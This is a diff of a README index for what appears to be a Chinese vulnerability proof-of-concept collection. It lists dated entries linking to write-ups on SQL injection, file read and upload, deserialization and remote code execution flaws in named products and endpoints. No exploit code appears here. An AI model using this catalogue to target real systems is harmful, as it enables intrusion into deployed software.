[29网课交单平台epay.php存在SQL注入漏洞](./网课交单平台/29网课交单平台epay.php存在SQL注入漏洞.md) +- [多客圈子论坛系统httpGet任意文件读取漏洞复现](./多客圈子论坛系统/多客圈子论坛系统httpGet任意文件读取漏洞复现.md) ## 2024.06.07 新增漏洞 -- 天智云智造管理平台Usermanager.ashx存在SQL注入漏洞 -- 海康威视综合安防管理平台productFile远程代码执行 -- 海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞 -- showdoc3.2.4-phar反序列漏洞复现 -- Progress-Telerik-Report-Server身份验证绕过(CVE-2024-4358) -- 悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052) -- PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577) -- 用友NC-downCourseWare任意文件读取 -- 用友-U9-PatchFile.asmx任意文件上传漏洞 -- Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348) +- [天智云智造管理平台Usermanager.ashx存在SQL注入漏洞](./天智云/天智云智造管理平台Usermanager.ashx存在SQL注入漏洞.md) +- [海康威视综合安防管理平台productFile远程代码执行](./海康威视/海康威视综合安防管理平台productFile远程代码执行.md) +- [海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞](./海康威视/海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞.md) +- [showdoc3.2.4-phar反序列漏洞复现](./showdoc/showdoc3.2.4-phar反序列漏洞复现.md) +- [Progress-Telerik-Report-Server身份验证绕过(CVE-2024-4358)](./Progress/Progress-Telerik-Report-Server身份验证绕过(CVE-2024-4358).md) +- [悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052)](./悟空CRM/悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052).md) +- [PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577)](./php/PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577).md) +- 
[用友NC-downCourseWare任意文件读取](./用友OA/用友NC-downCourseWare任意文件读取.md) +- [用友-U9-PatchFile.asmx任意文件上传漏洞](./用友OA/用友-U9-PatchFile.asmx任意文件上传漏洞.md) +- [Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348)](./Apache/Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348).md) ## 2024.06.05 新增漏洞 -- Symfony-app_dev.php信息泄露漏洞 -- 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞 -- O2OA远程命令执行(CVE-2022-22916) -- 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞 -- H3C-CVM-upload接口前台任意文件上传漏洞复现 -- 用友NC-pagesServlet存在SQL注入 -- 宏景HCM-pos_dept_post存在SQL注入漏洞 -- 迈普多业务融合网关send_order.cgi存在命令执行漏洞 -- HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470) -- Minio-verify信息泄露(CVE-2023-28432) -- OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428) -- ShowDoc3.2.5存在SQL注入漏洞 -- mysql2原型污染漏洞(CVE-2024-21512) -- 亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞 -- Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104) -- 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞 -- 泛微E-Office-json_common.phpSQL注入漏洞 -- 泛微E-Office系统login_other.php存在sql注入漏洞 +- [Symfony-app_dev.php信息泄露漏洞](./Symfony/Symfony-app_dev.php信息泄露漏洞.md) +- [泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞](./泛微OA/泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞.md) +- [O2OA远程命令执行(CVE-2022-22916)](./O2OA/O2OA远程命令执行(CVE-2022-22916).md) +- [大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞](./大华/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md) +- [H3C-CVM-upload接口前台任意文件上传漏洞复现](./H3C/H3C-CVM-upload接口前台任意文件上传漏洞复现.md) +- [用友NC-pagesServlet存在SQL注入](./用友OA/用友NC-pagesServlet存在SQL注入.md) +- [宏景HCM-pos_dept_post存在SQL注入漏洞](./宏景OA/宏景HCM-pos_dept_post存在SQL注入漏洞.md) +- [迈普多业务融合网关send_order.cgi存在命令执行漏洞](./迈普多业务融合网关/迈普多业务融合网关send_order.cgi存在命令执行漏洞.md) +- [HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470)](./HSC/HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470).md) +- [Minio-verify信息泄露(CVE-2023-28432)](./Minio/Minio-verify信息泄露(CVE-2023-28432).md) +- [OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428)](./OrangeHRM/OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428).md) +- 
[ShowDoc3.2.5存在SQL注入漏洞](./showdoc/ShowDoc3.2.5存在SQL注入漏洞.md) +- [mysql2原型污染漏洞(CVE-2024-21512)](./mysql2/mysql2原型污染漏洞(CVE-2024-21512).md) +- [亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞](./亿赛通电子文档安全管理系统/亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞.md) +- [Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)](./Apache/Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104).md) +- [飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞](./飞企互联/飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞.md) +- [泛微E-Office-json_common.phpSQL注入漏洞](./泛微OA/泛微E-Office-json_common.phpSQL注入漏洞.md) +- [泛微E-Office系统login_other.php存在sql注入漏洞](./泛微OA/泛微E-Office系统login_other.php存在sql注入漏洞.md) ## 2024.06.02 新增漏洞 -- 海康威视综合安防download存在任意文件读取漏洞 -- 科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入 -- 翰智员工服务平台loginByPassword存在SQL注入漏洞 -- DT高清车牌识别摄像机存在任意文件读取漏洞 -- showDoc-uploadImg任意文件上传漏洞 -- 全程云OA-svc.asmxSQL注入漏洞 +- [海康威视综合安防download存在任意文件读取漏洞](./海康威视/海康威视综合安防download存在任意文件读取漏洞.md) +- [科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入](./科讯图书馆综合管理云平台/科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入.md) +- [翰智员工服务平台loginByPassword存在SQL注入漏洞](./翰智员工服务平台/翰智员工服务平台loginByPassword存在SQL注入漏洞.md) +- [DT高清车牌识别摄像机存在任意文件读取漏洞](./DT/DT高清车牌识别摄像机存在任意文件读取漏洞.md) +- [showDoc-uploadImg任意文件上传漏洞](./showdoc/showDoc-uploadImg任意文件上传漏洞.md) +- [全程云OA-svc.asmxSQL注入漏洞](./全程云OA/全程云OA-svc.asmxSQL注入漏洞.md) - 中国移动云控制台存在任意文件读取 -- 泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞 -- 金蝶云星空UserService反序列化漏洞 -- 湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞 +- [泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞](./泛微OA/泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞.md) +- [金蝶云星空UserService反序列化漏洞](./金蝶/金蝶云星空UserService反序列化漏洞.md) +- [湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞](./湖南建研检测系统/湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞.md) ## 2024.05.31 新增漏洞 -- PHP-Live-Chat代码审计之组合拳GetShell -- 宏景eHR-showmedia.jsp存在SQL注入漏洞 -- NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208) -- 用友智石开PLM-getWorkGroups存在信息泄露漏洞 -- 智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞 -- 中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞 -- JEPaaS低代码平台document存在文件上传致RCE漏洞 -- 大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞 -- 
Check-Point安全网关任意文件读取漏洞(CVE-2024-24919) -- 电信网关配置管理后台rewrite.php接口存在文件上传漏洞 +- [PHP-Live-Chat代码审计之组合拳GetShell](./PHP%20Live%20Chat/PHP-Live-Chat代码审计之组合拳GetShell.md) +- [宏景eHR-showmedia.jsp存在SQL注入漏洞](./宏景OA/宏景eHR-showmedia.jsp存在SQL注入漏洞.md) +- [NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208)](./NextGen/NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208).md) +- [用友智石开PLM-getWorkGroups存在信息泄露漏洞](./用友OA/用友智石开PLM-getWorkGroups存在信息泄露漏洞.md) +- [智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞](./智邦国际ERP/智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞.md) +- [中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞](./中成科信票务管理系统/中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞.md) +- [JEPaaS低代码平台document存在文件上传致RCE漏洞](./JEPaaS低代码平台/JEPaaS低代码平台document存在文件上传致RCE漏洞.md) +- [大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞](./大华/大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞.md) +- [Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)](./Check%20Point安全网关/Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md) +- [电信网关配置管理后台rewrite.php接口存在文件上传漏洞](./电信网关配置管理/电信网关配置管理后台rewrite.php接口存在文件上传漏洞.md) ## 2024.05.28 新增漏洞 -- DCN有线无线智能一体化控制器WEB管理系统 -- 用友NC系统linkVoucher存在sql注入漏洞 -- 锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行 -- 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行 -- 锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行 -- 锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行 -- 锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行 -- 大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取 -- 锐捷RG-EW1200G无线路由器登录绕过 -- Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞 -- WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495) -- WordPress-WebDirectory插件存在sql注入(CVE-2024-3552) -- WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443) -- 因酷教育软件开源网校程序gok4任意文件上传漏洞 +- [DCN有线无线智能一体化控制器WEB管理系统](./DCN/DCN有线无线智能一体化控制器WEB管理系统.md) +- [用友NC系统linkVoucher存在sql注入漏洞](./用友OA/用友NC系统linkVoucher存在sql注入漏洞.md) +- [锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行.md) +- 
[锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_ipv6.php存在远程代码执行.md) +- [锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统sub_commit.php存在远程代码执行.md) +- [锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统user_commit.php存在远程代码执行.md) +- [锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行](./锐捷/锐捷RG-UAC统一上网行为管理审计系统vlan_add_commit.php存在远程代码执行.md) +- [大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取](./大华/大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取.md) +- [锐捷RG-EW1200G无线路由器登录绕过](./锐捷/锐捷RG-EW1200G无线路由器登录绕过.md) +- [Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞](./JeecgBoot/Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞.md) +- [WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495)](./WordPress/WordPress-Dropdown-CF7插件存在sql注入漏洞(CVE-2024-3495).md) +- [WordPress-WebDirectory插件存在sql注入(CVE-2024-3552)](./WordPress/WordPress-WebDirectory插件存在sql注入(CVE-2024-3552).md) +- [WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443)](./WordPress/WordPress的Business-Directory插件存在sql注入漏洞(CVE-2024-4443).md) +- [因酷教育软件开源网校程序gok4任意文件上传漏洞](./因酷教育软件/因酷教育软件开源网校程序gok4任意文件上传漏洞.md) ## 2024.05.25 新增漏洞 -- 瑞星EDR-XSS漏洞可打管理员cookie +- [瑞星EDR-XSS漏洞可打管理员cookie](./瑞星EDR/瑞星EDR-XSS漏洞可打管理员cookie.md) -- 金山云EDR任意文件上传漏洞 +- [金山云EDR任意文件上传漏洞](./金山/金山云EDR任意文件上传漏洞.md) -- HM发卡网反序列化漏洞 +- [HM发卡网反序列化漏洞](./发卡网系统/HM发卡网反序列化漏洞.md) -- Nexus未授权目录穿越漏洞(CVE-2024-4956) -- 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202) -- 万户ezEIP-success.aspx存在反序列化漏洞 -- 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744) -- 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞 -- 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞 -- 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞 -- 泛微E-Office10-OfficeServer任意文件上传漏洞 -- ArubaOS-RCE漏洞(CVE-2024-26304) -- H3C路由器userLogin.asp信息泄漏漏洞 -- 用友nc电子采购信息系统securitycheck存在sql注入 -- 用友NC-warningDetailInfo接口存在SQL注入漏洞 -- Confluence远程命令执行漏洞(CVE-2024-21683) -- 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞 -- 蓝海卓越计费管理系统存在download.php任意文件读取漏洞 +- 
[Nexus未授权目录穿越漏洞(CVE-2024-4956)](./Nexus/Nexus未授权目录穿越漏洞(CVE-2024-4956).md) +- [泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202)](./泛微OA/泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md) +- [万户ezEIP-success.aspx存在反序列化漏洞](./万户OA/万户ezEIP-success.aspx存在反序列化漏洞.md) +- [通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)](./通天星/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md) +- [通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞](./通天星/通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md) +- [通天星CMSV6车载视频监控平台xz_center信息泄露漏洞](./通天星/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md) +- [智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞](./智慧校园(安校易)管理系统/智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md) +- [泛微E-Office10-OfficeServer任意文件上传漏洞](./泛微OA/泛微E-Office10-OfficeServer任意文件上传漏洞.md) +- [ArubaOS-RCE漏洞(CVE-2024-26304)](./Aruba/ArubaOS-RCE漏洞(CVE-2024-26304).md) +- [H3C路由器userLogin.asp信息泄漏漏洞](./H3C/H3C路由器userLogin.asp信息泄漏漏洞.md) +- [用友nc电子采购信息系统securitycheck存在sql注入](./用友OA/用友nc电子采购信息系统securitycheck存在sql注入.md) +- [用友NC-warningDetailInfo接口存在SQL注入漏洞](./用友OA/用友NC-warningDetailInfo接口存在SQL注入漏洞.md) +- [Confluence远程命令执行漏洞(CVE-2024-21683)](./Confluence/Confluence远程命令执行漏洞(CVE-2024-21683).md) +- [蓝海卓越计费管理系统存在debug.php远程命令执行漏洞](./蓝海卓越计费管理系统/蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md) +- [蓝海卓越计费管理系统存在download.php任意文件读取漏洞](./蓝海卓越计费管理系统/蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md) ## 2024.05.23 新增漏洞 -- 致远OAV52019系统properties信息泄露漏洞 -- GeoServer系统wms接口存在远程命令执行漏洞 -- 用友NC-complainbilldetail存在SQL注入漏洞 -- 用友NC-downTax存在SQL注入漏洞 -- 宏景eHR-OutputCode存在任意文件读取漏洞 -- 用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748) -- 懒人网址导航页search.html存在SQL注入漏洞 -- LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞 -- LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞 -- 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞 -- 蓝海卓越计费管理系统SQL注入漏洞 -- 铭飞CMS-search接口存在sql注入漏洞 +- [致远OAV52019系统properties信息泄露漏洞](./致远OA/致远OAV52019系统properties信息泄露漏洞.md) +- [GeoServer系统wms接口存在远程命令执行漏洞](./GeoServer/GeoServer系统wms接口存在远程命令执行漏洞.md) +- [用友NC-complainbilldetail存在SQL注入漏洞](./用友OA/用友NC-complainbilldetail存在SQL注入漏洞.md) +- 
[用友NC-downTax存在SQL注入漏洞](./用友OA/用友NC-downTax存在SQL注入漏洞.md) +- [宏景eHR-OutputCode存在任意文件读取漏洞](./宏景OA/宏景eHR-OutputCode存在任意文件读取漏洞.md) +- [用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748)](./用友OA/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md) +- [懒人网址导航页search.html存在SQL注入漏洞](./懒人网址导航页/懒人网址导航页search.html存在SQL注入漏洞.md) +- [LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞](./LVS精益价值管理系统/LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞.md) +- [LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞](./LVS精益价值管理系统/LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md) +- [泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞](./泛微OA/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md) +- [蓝海卓越计费管理系统SQL注入漏洞](./蓝海卓越计费管理系统/蓝海卓越计费管理系统SQL注入漏洞.md) +- [铭飞CMS-search接口存在sql注入漏洞](./铭飞/铭飞CMS-search接口存在sql注入漏洞.md) ## 2024.05.21 新增漏洞 -- QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130) -- Zabbix-Serve-SQL注入漏洞(CVE-2024-22120) -- 山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞 -- 方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞 -- Git远程代码执行漏洞(CVE-2024-32002) -- Gradio存在任意文件读取漏洞(CVE-2024-1561) -- EasyCVR视频管理平台存在任意用户添加漏洞 -- 用友U8-Cloud系统XChangeServlet接口存在XXE漏洞 -- emlog后台插件任意文件上传(CVE-2024-33752) -- 泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞 -- cockpit系统upload接口存在文件上传漏洞 -- 宏景HCM系统fieldsettree接口存在SQL注入漏洞 +- [QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130)](./QNAP/QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130).md) +- [Zabbix-Serve-SQL注入漏洞(CVE-2024-22120)](./Zabbix/Zabbix-Serve-SQL注入漏洞(CVE-2024-22120).md) +- [山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞](./山东聚恒网络技术有限公司/山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞.md) +- [方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞](./方正全媒体/方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞.md) +- [Git远程代码执行漏洞(CVE-2024-32002)](./Git/Git远程代码执行漏洞(CVE-2024-32002).md) +- [Gradio存在任意文件读取漏洞(CVE-2024-1561)](./Gradio/Gradio存在任意文件读取漏洞(CVE-2024-1561).md) +- [EasyCVR视频管理平台存在任意用户添加漏洞](./EasyCVR视频管理平台/EasyCVR视频管理平台存在任意用户添加漏洞.md) +- [用友U8-Cloud系统XChangeServlet接口存在XXE漏洞](./用友OA/用友U8-Cloud系统XChangeServlet接口存在XXE漏洞.md) +- [emlog后台插件任意文件上传(CVE-2024-33752)](./Emlog/emlog后台插件任意文件上传(CVE-2024-33752).md) +- 
[泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞](./泛微OA/泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞.md) +- [cockpit系统upload接口存在文件上传漏洞](./cockpit/cockpit系统upload接口存在文件上传漏洞.md) +- [宏景HCM系统fieldsettree接口存在SQL注入漏洞](./宏景OA/宏景HCM系统fieldsettree接口存在SQL注入漏洞.md) ## 2024.05.18 新增漏洞 -- 英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞 -- 佳会视频会议attachment任意文件读取 -- 六零导航页存在任意文件上传漏洞 -- SeaCMS海洋影视管理系统dmku存在SQL注入漏洞 -- 用友CRM系统uploadfile.php接口存在任意文件上传 -- 安达通TPN-2G安全网关远程代码执行 -- 科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞 -- 科拓全智能停车收费系统Webservice.asmx存在任意文件上传 -- D-LINK-DIR-X4860未授权RCE漏洞 +- [英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞](./英飞达医学影像存档与通信系统/英飞达医学影像存档与通信系统WebJobUpload任意文件上传漏洞.md) +- [佳会视频会议attachment任意文件读取](./佳会视频会议/佳会视频会议attachment任意文件读取.md) +- [六零导航页存在任意文件上传漏洞](./六零导航页/六零导航页存在任意文件上传漏洞.md) +- [SeaCMS海洋影视管理系统dmku存在SQL注入漏洞](./海洋cms/SeaCMS海洋影视管理系统dmku存在SQL注入漏洞.md) +- [用友CRM系统uploadfile.php接口存在任意文件上传](./用友OA/用友CRM系统uploadfile.php接口存在任意文件上传.md) +- [安达通TPN-2G安全网关远程代码执行](./安达通/安达通TPN-2G安全网关远程代码执行.md) +- [科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞](./科拓全智能停车收费系统/科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md) +- [科拓全智能停车收费系统Webservice.asmx存在任意文件上传](./科拓全智能停车收费系统/科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md) +- [D-LINK-DIR-X4860未授权RCE漏洞](./D-Link/D-LINK-DIR-X4860未授权RCE漏洞.md) ## 2024.05.13 新增漏洞 -- 用友NC系统registerServlet接口存在JNDI注入漏洞 -- 微擎-AccountEdit-file-upload文件上传漏洞 -- RuvarOA协同办公平台多处存在SQL注入漏洞 -- 微厦在线学习平台OrganSetup存在任意文件上传漏洞 -- 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞 -- 用友NC系统printBill接口存在任意文件读取漏洞 -- 泛微-OA系统ResourceServlet接口任意文件读取漏洞 -- 锐捷网络flwo.control.php存在RCE漏洞 -- 亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞 -- 大华ICC智能物联综合管理平台存在fastjson漏洞 -- 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞 -- 世纪信通管理系统DownLoadFiles.ashx存在任意文件读取 -- 亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞 +- [用友NC系统registerServlet接口存在JNDI注入漏洞](./用友OA/用友NC系统registerServlet接口存在JNDI注入漏洞.md) +- [微擎-AccountEdit-file-upload文件上传漏洞](./微擎/微擎-AccountEdit-file-upload文件上传漏洞.md) +- [RuvarOA协同办公平台多处存在SQL注入漏洞](./RuvarOA协同办公平台/RuvarOA协同办公平台多处存在SQL注入漏洞.md) +- 
[微厦在线学习平台OrganSetup存在任意文件上传漏洞](./微厦在线学习平台/微厦在线学习平台OrganSetup存在任意文件上传漏洞.md) +- [泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞](./泛微OA/泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md) +- [用友NC系统printBill接口存在任意文件读取漏洞](./用友OA/用友NC系统printBill接口存在任意文件读取漏洞.md) +- [泛微-OA系统ResourceServlet接口任意文件读取漏洞](./泛微OA/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md) +- [锐捷网络flwo.control.php存在RCE漏洞](./锐捷/锐捷网络flwo.control.php存在RCE漏洞.md) +- [亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md) +- [大华ICC智能物联综合管理平台存在fastjson漏洞](./大华/大华ICC智能物联综合管理平台存在fastjson漏洞.md) +- [联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞](./联软/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md) +- [世纪信通管理系统DownLoadFiles.ashx存在任意文件读取](./世纪信通管理系统/世纪信通管理系统DownLoadFiles.ashx存在任意文件读取.md) +- [亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md) ## 2024.05.08 新增漏洞 -- 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞 -- 用友时空KSOA-linkadd.jsp存在SQL注入漏洞 -- MetaCRM客户关系管理系统任意文件上传漏洞 -- 用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞 -- 电信网关配置管理后台ipping.php存在命令执行漏洞 -- 瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞 -- 泛微OA-E-Cology-FileDownload文件读取漏洞 -- 用友GRPA++Cloud政府财务云存在任意文件读取漏洞 -- 红海云eHR-PtFjk.mob存在任意文件上传漏洞 -- 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞 -- 金和OAC6-FileDownLoad.aspx任意文件读取漏洞 -- F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793) -- Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640) -- 中移铁通禹路由器信息泄露漏洞 -- 致远M3敏感信息泄露漏洞 -- Jan任意文件上传漏洞 -- Jeecg任意文件上传漏洞 -- 医院挂号系统SQL注入 +- [用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞](./用友OA/用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞.md) +- [用友时空KSOA-linkadd.jsp存在SQL注入漏洞](./用友OA/用友时空KSOA-linkadd.jsp存在SQL注入漏洞.md) +- [MetaCRM客户关系管理系统任意文件上传漏洞](./MetaCRM/MetaCRM客户关系管理系统任意文件上传漏洞.md) +- [用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞](./用友OA/用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞.md) +- [电信网关配置管理后台ipping.php存在命令执行漏洞](./电信网关配置管理/电信网关配置管理后台ipping.php存在命令执行漏洞.md) +- [瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞](./瑞友天翼应用虚拟化系统/瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md) +- 
[泛微OA-E-Cology-FileDownload文件读取漏洞](./泛微OA/泛微OA-E-Cology-FileDownload文件读取漏洞.md) +- [用友GRPA++Cloud政府财务云存在任意文件读取漏洞](./用友OA/用友GRPA++Cloud政府财务云存在任意文件读取漏洞.md) +- [红海云eHR-PtFjk.mob存在任意文件上传漏洞](./红海云eHR/红海云eHR-PtFjk.mob存在任意文件上传漏洞.md) +- [福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞](./福建科立讯通信/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md) +- [金和OAC6-FileDownLoad.aspx任意文件读取漏洞](./金和OA/金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md) +- [F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793)](./F5-BIG-IP/F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793).md) +- [Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640)](./Mura/Mura-CMS-processAsyncObject存在SQL注入漏洞(CVE-2024-32640).md) +- [中移铁通禹路由器信息泄露漏洞](./路由器/中移铁通禹路由器信息泄露漏洞.md) +- [致远M3敏感信息泄露漏洞](./致远OA/致远M3敏感信息泄露漏洞.md) +- [Jan任意文件上传漏洞](./Jan/Jan任意文件上传漏洞.md) +- [Jeecg任意文件上传漏洞](./JeecgBoot/Jeecg任意文件上传漏洞.md) +- [医院挂号系统SQL注入](./医院挂号系统/医院挂号系统SQL注入.md) ## 2024.05.02 新增漏洞 -- 和丰多媒体信息发布系统QH.aspx存在文件上传漏洞 -- 用友NC-bill存在SQL注入漏洞 -- 用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞 -- 